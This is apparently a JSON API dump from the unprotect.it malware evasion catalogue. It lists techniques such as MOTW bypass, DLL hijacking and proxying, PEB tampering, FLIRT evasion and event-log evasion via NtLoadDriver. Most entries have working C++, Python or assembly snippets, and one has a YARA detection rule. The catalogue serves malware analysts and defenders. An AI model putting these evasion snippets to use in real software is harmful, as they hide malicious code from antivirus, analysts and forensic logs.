GET /api/techniques/
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 205,
    "next": "https://unprotect.it/api/techniques/?page=2",
    "previous": null,
    "results": [
        {
            "id": 222,
            "unprotect_id": "U0517",
            "name": "Mark-Of-The-Web (MOTW) Bypass",
            "categories": [
                {
                    "id": 2,
                    "key": "antivirus-evasion",
                    "label": "Antivirus Evasion"
                }
            ],
            "description": "Mark-of-the-Web (MOTW) is a security feature originally introduced by Internet Explorer. When downloading a file, Internet Explorer creates an ADS named Zone.Identifier and adds a ZoneId to this stream to indicate from which zone the file originates. It is used on Windows OS to trigger a Windows Defender SmartScreen detection and raise an alert to the user about the file. \r\n\r\nThe following ZoneId values may be used in a Zone.Identifier ADS:\r\n\r\n* 0 Local computer\r\n* 1 Local intranet\r\n* 2 Trusted sites\r\n* 3 Internet\r\n* 4 Restricted sites\r\n\r\nIn some cases, the Alternate Data Stream will be `SmartScreen` with the value `anaheim`. To bypass this security feature malware authors can use file format that does not manage the MOTW such as ISO or VHD file. \r\n\r\nUsing `git clone` can also be an alternative as a file cloned from GitHub with the Git client does not have a Zone.Identifier ADS.",
            "resources": "https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/\r\nhttps://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
            "tags": "#MOTW",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 221,
            "unprotect_id": "U1241",
            "name": "Tamper DLL Export Names & GetProcAddress Spoofing",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "When a process is running, it is possible to change the results of the call to `GetProcAddress` API, for the exported functions of a module along with modifying the export's offsets and name at runtime. \r\n\r\nFor example, the offset of `kernel32.dll's` function `VirtualAlloc` can be change to the offset of another function. When `VirtualAlloc` is called (after getting its address from `GetProcAddress`), the second function will be called instead. \r\n\r\nTo achieve this, it is possible to use the WINAPI `MapAndLoad` from `ImageHlp.h`, then use `ImageDirectoryEntryToData` to get the list of exports. Then the `ImageRvaToVa`  API can be used to retrieve each exported functions names offset; if desired the export name can be overwritten, resulting in calls to `GetProcAddress` with that export name to fail or be directed to another function.",
            "resources": "",
            "tags": "",
            "snippets": [
                {
                    "id": 122,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 18,
                        "name": "Alex Schwarz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/alex-schwarz",
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/221/",
                    "description": "",
                    "plain_code": "#pragma comment(linker,\"/export:FuncA=DLLExport.FunctionA,@1\") \r\n\r\n#include <iostream>\r\n#include <Windows.h>\r\n#include <ImageHlp.h>\r\n#pragma comment(lib, \"ImageHlp\")\r\n\r\nusing namespace std;\r\n\r\nbool ModifyDLLExportName(string dllName, string functionName, string newName)\r\n{\r\n\tDWORD* dNameRVAs(0);\r\n\t_IMAGE_EXPORT_DIRECTORY* ImageExportDirectory;\r\n\tunsigned long cDirSize;\r\n\t_LOADED_IMAGE LoadedImage;\r\n\tstring sName;\r\n\r\n\tif (MapAndLoad(dllName.c_str(), NULL, &LoadedImage, TRUE, TRUE))\r\n\t{\r\n\t\tImageExportDirectory = (_IMAGE_EXPORT_DIRECTORY*)ImageDirectoryEntryToData(LoadedImage.MappedAddress, false, IMAGE_DIRECTORY_ENTRY_EXPORT, &cDirSize);\r\n\r\n\t\tif (ImageExportDirectory != NULL)\r\n\t\t{\r\n\r\n\t\t\tdNameRVAs = (DWORD*)ImageRvaToVa(LoadedImage.FileHeader, LoadedImage.MappedAddress, ImageExportDirectory->AddressOfNames, NULL);\r\n\r\n\t\t\tfor (size_t i = 0; i < ImageExportDirectory->NumberOfNames; i++)\r\n\t\t\t{\r\n\t\t\t\tsName = (char*)ImageRvaToVa(LoadedImage.FileHeader, LoadedImage.MappedAddress, dNameRVAs[i], NULL);\r\n\r\n\t\t\t\tif (strcmp(functionName.c_str(), sName.c_str()) == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tUINT64 funcName_Address = (UINT64)GetModuleHandleA(dllName.c_str()) + dNameRVAs[i];\r\n\r\n\t\t\t\t\tDWORD oldProt = 0;\r\n\r\n\t\t\t\t\tif (!VirtualProtect((LPVOID)funcName_Address, 1024, PAGE_EXECUTE_READWRITE, &oldProt))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"VirtualProtect failed: %d\\n\", GetLastError());\r\n\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy_s((char*)funcName_Address, 100, newName.c_str());\r\n\t\t\t\t\t\tprintf(\"Copied over export function name..\\n\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tUnMapAndLoad(&LoadedImage);\r\n\t}\r\n\r\n\treturn true;\r\n}\r\n\r\n\r\nint main(void)\r\n{\r\n\t//user-provided DLL Tests\r\n\tLoadLibraryA(\"DllExport.dll\");\r\n\r\n\tDWORD addr_exe = (DWORD)GetProcAddress(GetModuleHandleA(\"ModifyExports.exe\"), \"FuncA\"); //using linker statement at top\r\n\tprintf(\"Addr: %x\\n\", addr_exe);\r\n\r\n\tDWORD addr_dll = (DWORD)GetProcAddress(GetModuleHandleA(\"DllExport.dll\"), \"FunctionA\"); //returns same value as above line (address of DllExport.FunctionA)\r\n\tprintf(\"Addr: %x\\n\", addr_dll);\r\n\r\n\tModifyDLLExportName(\"DllExport.dll\", \"FunctionA\", \"FunctionB\");\r\n\tDWORD addr_dll_B = (DWORD)GetProcAddress(GetModuleHandleA(\"DllExport.dll\"), \"FunctionB\"); //returns same value as above, thus looking up FunctionB gives us FunctionA.\r\n\tprintf(\"Addr: %x\\n\", addr_dll_B);\r\n\r\n\t//WINAPI Tests\r\n\r\n\tDWORD addr = (DWORD)GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualAlloc\"); //this will return 0, as the above line changed the export's name.\r\n\tprintf(\"Addr: %x\\n\", addr);\r\n\tModifyDLLExportName(\"kernel32.dll\", \"VirtualAlloc\", \"VirtualQuery\");\r\n\taddr = (DWORD)GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualAlloc\"); //returns 0\r\n\tprintf(\"Addr: %x\\n\", addr);\r\n\taddr = (DWORD)GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualQuery\"); //now returns the address of VirtualAlloc, not VirtualQuery!\r\n\tprintf(\"Addr: %x\\n\", addr);\r\n\tsystem(\"pause\");\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 220,
            "unprotect_id": "T1574.001",
            "name": "DLL Search Order Hijacking",
            "categories": [
                {
                    "id": 10,
                    "key": "Defense-Evasion-Mitre",
                    "label": "Defense Evasion [Mitre]"
                }
            ],
            "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. \r\n\r\nHijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.",
            "resources": "https://attack.mitre.org/techniques/T1574/001/\r\nhttps://pentestlab.blog/2017/03/27/dll-hijacking/\r\nhttps://itm4n.github.io/windows-dll-hijacking-clarified/\r\nhttps://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0\r\nhttps://github.com/Sh0ckFR/DLLirant",
            "tags": "",
            "snippets": [
                {
                    "id": 120,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 19,
                        "name": "Sh0ckFR",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/yann-f/",
                        "twitter": "https://twitter.com/Sh0ckFR",
                        "website": "https://sh0ckfr.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/220/",
                    "description": "DLL Search Order Hijacking via DnsFreeConfigStructure function in the DLL DNSAPI.dll of the executable nslookup.exe.",
                    "plain_code": "#include <windows.h>\r\n\r\nint Main() {\r\n    MessageBoxW(0, L\"DLL Search Order Hijacking is present\", L\"DLL Search Order Hijacking\", 0);\r\n    return 1;\r\n}\r\n\r\nBOOL APIENTRY DllMain(HMODULE hModule,\r\n    DWORD  ul_reason_for_call,\r\n    LPVOID lpReserved\r\n)\r\n{\r\n    switch (ul_reason_for_call)\r\n    {\r\n    case DLL_PROCESS_ATTACH:\r\n        CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)Main, NULL, NULL, NULL);\r\n        break;\r\n    case DLL_THREAD_ATTACH:\r\n    case DLL_THREAD_DETACH:\r\n    case DLL_PROCESS_DETACH:\r\n        break;\r\n    }\r\n    return TRUE;\r\n}\r\n\r\n__declspec(dllexport) void DnsFreeConfigStructure() { Main(); }"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 219,
            "unprotect_id": "U1240",
            "name": "DLL Proxying",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "In the context of malware, DLL proxying is a DLL hijacking technique, where a legitimate DLL say, legit.dll is renamed to legit1.dll and a malicious dll, which exports all the same functions that the legit1.dll exports, is placed instead of legit.dll.",
            "resources": "https://www.ired.team/offensive-security/persistence/dll-proxying-for-persistence\r\nhttps://itm4n.github.io/dll-proxying/\r\nhttps://github.com/Sh0ckFR/DLLirant",
            "tags": "",
            "snippets": [
                {
                    "id": 118,
                    "language": {
                        "id": 3,
                        "label": "Python",
                        "code_class": "python"
                    },
                    "author": {
                        "id": 19,
                        "name": "Sh0ckFR",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/yann-f/",
                        "twitter": "https://twitter.com/Sh0ckFR",
                        "website": "https://sh0ckfr.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/219/",
                    "description": "Basic python script to extract all exported functions of a targeted DLL, here DNSAPI.dll used by nslookup.exe.",
                    "plain_code": "import pefile\r\n\r\nexported_functions = []\r\npe = pefile.PE('C:\\\\windows\\\\system32\\\\DNSAPI.dll')\r\nfor entry in pe.DIRECTORY_ENTRY_EXPORT.symbols:\r\n    func = entry.name.decode('utf-8')\r\n    exported_functions.append(f'#pragma comment(linker,\"/export:{func}=proxy.{func},@{entry.ordinal}\")')\r\n\r\nexported_functions = '\\n'.join(exported_functions)\r\nprint(exported_functions)"
                },
                {
                    "id": 119,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 19,
                        "name": "Sh0ckFR",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/yann-f/",
                        "twitter": "https://twitter.com/Sh0ckFR",
                        "website": "https://sh0ckfr.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/219/",
                    "description": "DLL Proxying code via `DNSAPI.dll` on nslookup.exe, in this exemple, the original `DNSAPI.dll` file must be renamed proxy.dll and the generated dll must be named `DNSAPI.dll`.",
                    "plain_code": "#pragma once\r\n#pragma comment(linker,\"/export:AdaptiveTimeout_ClearInterfaceSpecificConfiguration=proxy.AdaptiveTimeout_ClearInterfaceSpecificConfiguration,@1\")\r\n#pragma comment(linker,\"/export:AdaptiveTimeout_ResetAdaptiveTimeout=proxy.AdaptiveTimeout_ResetAdaptiveTimeout,@2\")\r\n#pragma comment(linker,\"/export:AddRefQueryBlobEx=proxy.AddRefQueryBlobEx,@3\")\r\n#pragma comment(linker,\"/export:BreakRecordsIntoBlob=proxy.BreakRecordsIntoBlob,@4\")\r\n#pragma comment(linker,\"/export:Coalesce_UpdateNetVersion=proxy.Coalesce_UpdateNetVersion,@5\")\r\n#pragma comment(linker,\"/export:CombineRecordsInBlob=proxy.CombineRecordsInBlob,@6\")\r\n#pragma comment(linker,\"/export:DeRefQueryBlobEx=proxy.DeRefQueryBlobEx,@7\")\r\n...\r\n\r\nint Main()\r\n{\r\n    // Your payload code.\r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)\r\n{\r\n    switch (fdwReason)\r\n    {\r\n    case DLL_PROCESS_ATTACH:\r\n        Main();\r\n        break;\r\n    case DLL_THREAD_ATTACH:\r\n        break;\r\n    case DLL_THREAD_DETACH:\r\n        break;\r\n    case DLL_PROCESS_DETACH:\r\n        break;\r\n    }\r\n    return TRUE;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 218,
            "unprotect_id": "U1239",
            "name": "Change Module Base Address at Runtime",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "It is possible to change the `DllBase` of a module at runtime. This can trick debugging and analysis tools such as IDA or Cheat Engine into thinking a module's base is actually at another address. \r\n\r\nThis is achieved by accessing the process PEB's member 'Ldr', in particular it has a member `InOrderMemoryLinks` which we can iterate through to get a list of the process's modules. On each iteration we get a `PLDR_DATA_TABLE_ENTRY` structure to work with which contains a member PVOID `DllBase`, that can be overwritten with the new module base address.",
            "resources": "",
            "tags": "",
            "snippets": [
                {
                    "id": 117,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 18,
                        "name": "Alex Schwarz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/alex-schwarz",
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/218/",
                    "description": "",
                    "plain_code": "#include <Windows.h>\r\n#include <Winternl.h>\r\n#include <stdint.h>\r\n\r\nbool ChangeModuleDllBase(const wchar_t* szModule, uint64_t newAddress)\r\n{\r\n\tPPEB PEB = (PPEB)__readgsqword(0x60);\r\n\t_LIST_ENTRY* f = PEB->Ldr->InMemoryOrderModuleList.Flink;\r\n\tbool Found = FALSE;\r\n\tint count = 0;\r\n\r\n\twhile (!Found && count < 256)\r\n\t{\r\n\t\tPLDR_DATA_TABLE_ENTRY dataEntry = CONTAINING_RECORD(f, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);\r\n\r\n\t\tif (wcsstr(dataEntry->FullDllName.Buffer, szModule))\r\n\t\t{\r\n\t\t\tdataEntry->DllBase = (PVOID)newAddress;\r\n\t\t\tFound = TRUE;\r\n\t\t\treturn true;\r\n\t\t}\r\n\r\n\t\tf = dataEntry->InMemoryOrderLinks.Flink;\r\n\t\tcount++;\r\n\t}\r\n\r\n\treturn false;\r\n}\r\n\r\nint main()\r\n{\r\n    ChangeModuleDllBase(L\"YourProgram.exe\", 0x123456789);\r\n    return 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 217,
            "unprotect_id": "U1238",
            "name": "Change Module Name at Runtime",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "It is possible to change the name of the current process or any of its modules at runtime. This is achieved by accessing the process PEB's member 'Ldr', in particular it has a member 'InOrderMemoryLinks' which we can iterate through to get a list of the process's modules. \r\n\r\nOn each iteration it gets a `PLDR_DATA_TABLE_ENTRY` structure to work with which contains a member `UNICODE_STRING FullDllName`, which can be overwritten with the module name.",
            "resources": "",
            "tags": "",
            "snippets": [
                {
                    "id": 116,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 18,
                        "name": "Alex Schwarz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/alex-schwarz",
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/217/",
                    "description": "",
                    "plain_code": "// changeModuleNameRuntime.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n#define _CRT_SECURE_NO_WARNINGS\r\n\r\n#include <iostream>\r\n#include <Windows.h>\r\n#include <Winternl.h>\r\n\r\ntypedef struct _MYPEB {\r\n\tUCHAR InheritedAddressSpace;\r\n\tUCHAR ReadImageFileExecOptions;\r\n\tUCHAR BeingDebugged;\r\n\tUCHAR Spare;\r\n\tPVOID Mutant;\r\n\tPVOID ImageBaseAddress;\r\n\tPEB_LDR_DATA* Ldr;\r\n\tPRTL_USER_PROCESS_PARAMETERS ProcessParameters;\r\n\tPVOID SubSystemData;\r\n\tPVOID ProcessHeap;\r\n\tPVOID FastPebLock;\r\n\tPVOID FastPebLockRoutine;\r\n\tPVOID FastPebUnlockRoutine;\r\n\tULONG EnvironmentUpdateCount;\r\n\tPVOID* KernelCallbackTable;\r\n\tPVOID EventLogSection;\r\n\tPVOID EventLog;\r\n\tPVOID FreeList;\r\n\tULONG TlsExpansionCounter;\r\n\tPVOID TlsBitmap;\r\n\tULONG TlsBitmapBits[0x2];\r\n\tPVOID ReadOnlySharedMemoryBase;\r\n\tPVOID ReadOnlySharedMemoryHeap;\r\n\tPVOID* ReadOnlyStaticServerData;\r\n\tPVOID AnsiCodePageData;\r\n\tPVOID OemCodePageData;\r\n\tPVOID UnicodeCaseTableData;\r\n\tULONG NumberOfProcessors;\r\n\tULONG NtGlobalFlag;\r\n\tUCHAR Spare2[0x4];\r\n\tULARGE_INTEGER CriticalSectionTimeout;\r\n\tULONG HeapSegmentReserve;\r\n\tULONG HeapSegmentCommit;\r\n\tULONG HeapDeCommitTotalFreeThreshold;\r\n\tULONG HeapDeCommitFreeBlockThreshold;\r\n\tULONG NumberOfHeaps;\r\n\tULONG MaximumNumberOfHeaps;\r\n\tPVOID** ProcessHeaps;\r\n\tPVOID GdiSharedHandleTable;\r\n\tPVOID ProcessStarterHelper; //PPS_POST_PREOCESS_INIT_ROUTINE?\r\n\tPVOID GdiDCAttributeList;\r\n\tPVOID LoaderLock;\r\n\tULONG OSMajorVersion;\r\n\tULONG OSMinorVersion;\r\n\tULONG OSBuildNumber;\r\n\tULONG OSPlatformId;\r\n\tULONG ImageSubSystem;\r\n\tULONG ImageSubSystemMajorVersion;\r\n\tULONG ImageSubSystemMinorVersion;\r\n\tULONG GdiHandleBuffer[0x22];\r\n\tPVOID ProcessWindowStation;\r\n} MYPEB, * PMYPEB;\r\n\r\nvoid ChangeModuleName(wchar_t* szModule, wchar_t* newName)\r\n{\r\n\tPPEB PEB = (PPEB)__readgsqword(0x60);\r\n\t_LIST_ENTRY* f = PEB->Ldr->InMemoryOrderModuleList.Flink;\r\n\tbool Found = FALSE;\r\n\r\n\twhile (!Found)\r\n\t{\r\n\t\tPLDR_DATA_TABLE_ENTRY dataEntry = CONTAINING_RECORD(f, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);\r\n\r\n\t\tif (wcsstr(dataEntry->FullDllName.Buffer, szModule) != NULL)\r\n\t\t{\r\n\t\t\twcscpy(dataEntry->FullDllName.Buffer, newName);\r\n\t\t\tFound = TRUE;\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tf = dataEntry->InMemoryOrderLinks.Flink;\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tChangeModuleName((wchar_t*)L\"myApplication.exe\", (wchar_t*) L\"NEW_MODULE_NAME\"); //you can also change to a module name with no file extension if you want to hide your module \r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 216,
            "unprotect_id": "U0220",
            "name": "FLIRT Signatures Evasion",
            "categories": [
                {
                    "id": 5,
                    "key": "anti-disassembly",
                    "label": "Anti-Disassembly"
                }
            ],
            "description": "FLIRT (Fast Library Identification and Recognition Technology) is a database that contains pattern of bytes (signatures) used to identify known functions from legit libraries.\r\n\r\nMalwares can abuse known FLIRT signatures by replacing or adding specific bytes to hide malicious code inside a function that would be recognised as a legitimate library.\r\n\r\nThis technique will trick the reverse engineering process if the FLIRT signatures is trusted without further analysis.",
            "resources": "https://hex-rays.com/products/ida/tech/flirt/in_depth/\r\nhttps://github.com/Maktm/FLIRTDB\r\nhttps://www.virustotal.com/gui/file/a41ba65405a032f4450ba80882cdd01d715d9d1684f4204050566be29a6dedb0",
            "tags": "flirt",
            "snippets": [
                {
                    "id": 115,
                    "language": {
                        "id": 5,
                        "label": "Assembly",
                        "code_class": "x86asm"
                    },
                    "author": {
                        "id": 9,
                        "name": "Lexsek",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/Lexsek_",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/216/",
                    "description": "The malicious sample listed below abused variant bytes of __IsNonwritableInCurrentImage signature to add two instructions consisting of an anti-debugging technique referenced as [U0114](https://unprotect.it/technique/closehandle-ntclose/) on Unprotect.\r\n\r\nSha256 : a41ba65405a032f4450ba80882cdd01d715d9d1684f4204050566be29a6dedb0",
                    "plain_code": "// Malicious code\r\n.text:00A4264A                 push    0DEADBEEFh\r\n.text:00A4264F                  call    kernel32_CloseHandle\r\n\r\n//Full abused function tagged as __IsNonwritableInCurrentImage.\r\n.text:00A42610 __IsNonwritableInCurrentImage proc near ; CODE XREF: sub_A428D0:loc_A429E2↓p\r\n.text:00A42610\r\n.text:00A42610                 ms_exc          = CPPEH_RECORD ptr -18h\r\n.text:00A42610\r\n.text:00A42610 ; __unwind { // __except_handler4\r\n.text:00A42610                 push    ebp\r\n.text:00A42611                 mov     ebp, esp\r\n.text:00A42613                 push    0FFFFFFFEh\r\n.text:00A42615                 push    offset stru_A5AE98\r\n.text:00A4261A                 push    offset __except_handler4\r\n.text:00A4261F                 mov     eax, large fs:0\r\n.text:00A42625                 push    eax\r\n.text:00A42626                 sub     esp, 8\r\n.text:00A42629                 push    ebx\r\n.text:00A4262A                 push    esi\r\n.text:00A4262B                 push    edi\r\n.text:00A4262C                 mov     eax, ___security_cookie\r\n.text:00A42631                 xor     [ebp+ms_exc.registration.ScopeTable], eax\r\n.text:00A42634                 xor     eax, ebp\r\n.text:00A42636                 push    eax\r\n.text:00A42637                 lea     eax, [ebp+ms_exc.registration]\r\n.text:00A4263A                 mov     large fs:0, eax\r\n.text:00A42640                 mov     [ebp+ms_exc.old_esp], esp\r\n.text:00A42643 ;   __try { // __except at loc_A42676\r\n.text:00A42643                 mov     [ebp+ms_exc.registration.TryLevel], 0\r\n.text:00A4264A                 push    0DEADBEEFh\r\n.text:00A4264F                 call    kernel32_CloseHandle\r\n.text:00A4264F ;   } // starts at A42643\r\n.text:00A42655                 mov     [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh\r\n.text:00A4265C                 xor     eax, eax\r\n.text:00A4265E                 mov     ecx, [ebp+ms_exc.registration.Next]\r\n.text:00A42661                 mov     large fs:0, ecx\r\n.text:00A42668                 pop     ecx\r\n.text:00A42669                 pop     edi\r\n.text:00A4266A                 pop     esi\r\n.text:00A4266B                 pop     ebx\r\n.text:00A4266C                 mov     esp, ebp\r\n.text:00A4266E                 pop     ebp\r\n.text:00A4266F                 retn\r\n.text:00A42670 ; ---------------------------------------------------------------------------\r\n.text:00A42670\r\n.text:00A42670 loc_A42670:                             ; DATA XREF: .rdata:stru_A5AE98↓o\r\n.text:00A42670 ;   __except filter // owned by A42643\r\n.text:00A42670                 mov     eax, 1\r\n.text:00A42675                 retn\r\n.text:00A42676 ; ---------------------------------------------------------------------------\r\n.text:00A42676\r\n.text:00A42676 loc_A42676:                             ; DATA XREF: .rdata:stru_A5AE98↓o\r\n.text:00A42676 ;   __except(loc_A42670) // owned by A42643\r\n.text:00A42676                 mov     esp, [ebp+ms_exc.old_esp]\r\n.text:00A42679                 mov     [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh\r\n.text:00A42680                 mov     eax, 2000h\r\n.text:00A42685                 mov     ecx, [ebp+ms_exc.registration.Next]\r\n.text:00A42688                 mov     large fs:0, ecx\r\n.text:00A4268F                 pop     ecx\r\n.text:00A42690                 pop     edi\r\n.text:00A42691                 pop     esi\r\n.text:00A42692                 pop     ebx\r\n.text:00A42693                 mov     esp, ebp\r\n.text:00A42695                 pop     ebp\r\n.text:00A42696                 retn\r\n.text:00A42696 ; } // starts at A42610\r\n.text:00A42696 __IsNonwritableInCurrentImage endp"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 215,
            "unprotect_id": "U0307",
            "name": "Windows Event Log Evasion via Native APIs",
            "categories": [
                {
                    "id": 8,
                    "key": "anti-forensic",
                    "label": "Anti-Forensic"
                }
            ],
            "description": "Attackers can leverage native Windows API calls to install malicious services without generating correlating entries in the event log. Using native APIs to install services instead of the standard API calls allow attackers to bypass security controls and event logging. This technique was utilised by Stuxnet.\r\n\r\nServices are typically created through a standard Windows API call `CreateServiceA` or `CreateService`. This API is also called by the service creating Windows native tool “sc.exe” to register a service on a machine. A call to this API subsequently generates entries in the event log which corresponds to the service creation event IDs. \r\n\r\nAttackers can create services without relying on the typical API call `CreateServiceA` by directly interacting with the Windows native API calls instead. For example, the `StartService` API will a make a call to the native API `NdrClientCall2` along with registering the service start events in the event logs. \r\n\r\nBy directly calling `NdrClientCall2` to start a service that’s had the registry keys manually created, the service is started and running, and no event logs are created allowing to evade forensic analysis. This will result in a malicious service running and without any event log entry. \r\n\r\nTo take this a step further, attackers can remove the evidence in the registry and any correlating evidence loaded in the memory of “services.exe”. This leaves with no registry artefacts and no event log information to analyse.",
            "resources": "https://www.inversecos.com/2022/03/windows-event-log-evasion-via-native.html",
            "tags": "stuxnet,antiforensic",
            "snippets": [
                {
                    "id": 114,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/215/",
                    "description": "NtLoadDriver technique used by Caberp malware.",
                    "plain_code": "VOID StartSys(LPCSTR chSysPath)\r\n{\r\n\tNTSTATUS St;\r\n\tBOOL bRet = FALSE;\r\n\tHKEY hKey;\r\n\tCHAR chRegPath[MAX_PATH];\r\n\tWCHAR wcLoadDrv[MAX_PATH];\r\n\tCHAR chImagePath[MAX_PATH] = \"\\\\??\\\\\";\r\n\tUNICODE_STRING usStr;\r\n\tDWORD dwType;\r\n\r\n\tGetPrivilege(SE_LOAD_DRIVER_PRIVILEGE);\r\n\r\n\tDbgPrint(__FUNCTION__\"(): driver path '%s'\\n\",chSysPath);\r\n\r\n\tDWORD dwId = GetTickCount();\r\n\r\n\t_snprintf(chRegPath,RTL_NUMBER_OF(chRegPath)-1,\"system\\\\currentcontrolset\\\\services\\\\%x\", dwId);\r\n\t_snwprintf(wcLoadDrv,RTL_NUMBER_OF(wcLoadDrv)-1,L\"\\\\registry\\\\machine\\\\system\\\\currentcontrolset\\\\services\\\\%x\", dwId);\r\n\r\n\tstrncat(chImagePath,chSysPath,sizeof(chImagePath));\r\n\tif (RegCreateKey(HKEY_LOCAL_MACHINE,chRegPath,&hKey) == ERROR_SUCCESS)\r\n\t{\r\n\t\tRegSetValueEx(hKey,\"ImagePath\",0,REG_SZ,(LPBYTE)&chImagePath,strlen(chImagePath)+1);\r\n\r\n\t\tdwType = SERVICE_KERNEL_DRIVER;\r\n\t\tRegSetValueEx(hKey,\"Type\",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));\r\n\r\n\t\tdwType = SERVICE_DEMAND_START;\r\n\t\tRegSetValueEx(hKey,\"Start\",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));\r\n\r\n\t\tRegCloseKey(hKey);\r\n\r\n\t\tRtlInitUnicodeString(&usStr,wcLoadDrv);\r\n\t\tSt = NtLoadDriver(&usStr);\r\n\r\n\t\tDbgPrint(__FUNCTION__\"(): NtLoadDriver status %x\\n\",St);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tDbgPrint(__FUNCTION__\"(): RegCreateKey last error %x\\n\",GetLastError());\r\n\t}\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 83,
                    "key": "yara_detect_eventlogtampering",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_EventLogTampering",
                    "rule": "rule Detect_EventLogTampering: AntiForensic {\r\n    meta: \r\n        description = \"Detect NtLoadDriver and other as anti-forensic\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtLoadDriver \" fullword ascii\r\n        $2 = \"NdrClientCall2\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
                }
            ]
        },
        {
            "id": 214,
            "unprotect_id": "U0131",
            "name": "Trap Flag",
            "categories": [
                {
                    "id": 3,
                    "key": "anti-debugging",
                    "label": "Anti-Debugging"
                }
            ],
            "description": "There is a Trap Flag in the Flags register. Bit number 8 of the EFLAGS register is the trap flag. When the Trap Flag is set, a SINGLE_STEP exception is generated.",
            "resources": "https://www.autosectools.com/anti-debugging-with-exceptions.pdf",
            "tags": "trapflag",
            "snippets": [
                {
                    "id": 101,
                    "language": {
                        "id": 5,
                        "label": "Assembly",
                        "code_class": "x86asm"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/214/",
                    "description": "",
                    "plain_code": "BOOL IsDebuggerPresent_TrapFlag()\r\n{\r\n    __try\r\n    { \r\n        __asm\r\n       {\r\n           pushfd\r\n           or word ptr[esp], 0x100\r\n           popfd\r\n           nop\r\n       }\r\n    }\r\n    __except(1) \r\n    { \r\n        return FALSE; \r\n    }\r\n    return TRUE;\r\n}"
                },
                {
                    "id": 103,
                    "language": {
                        "id": 2,
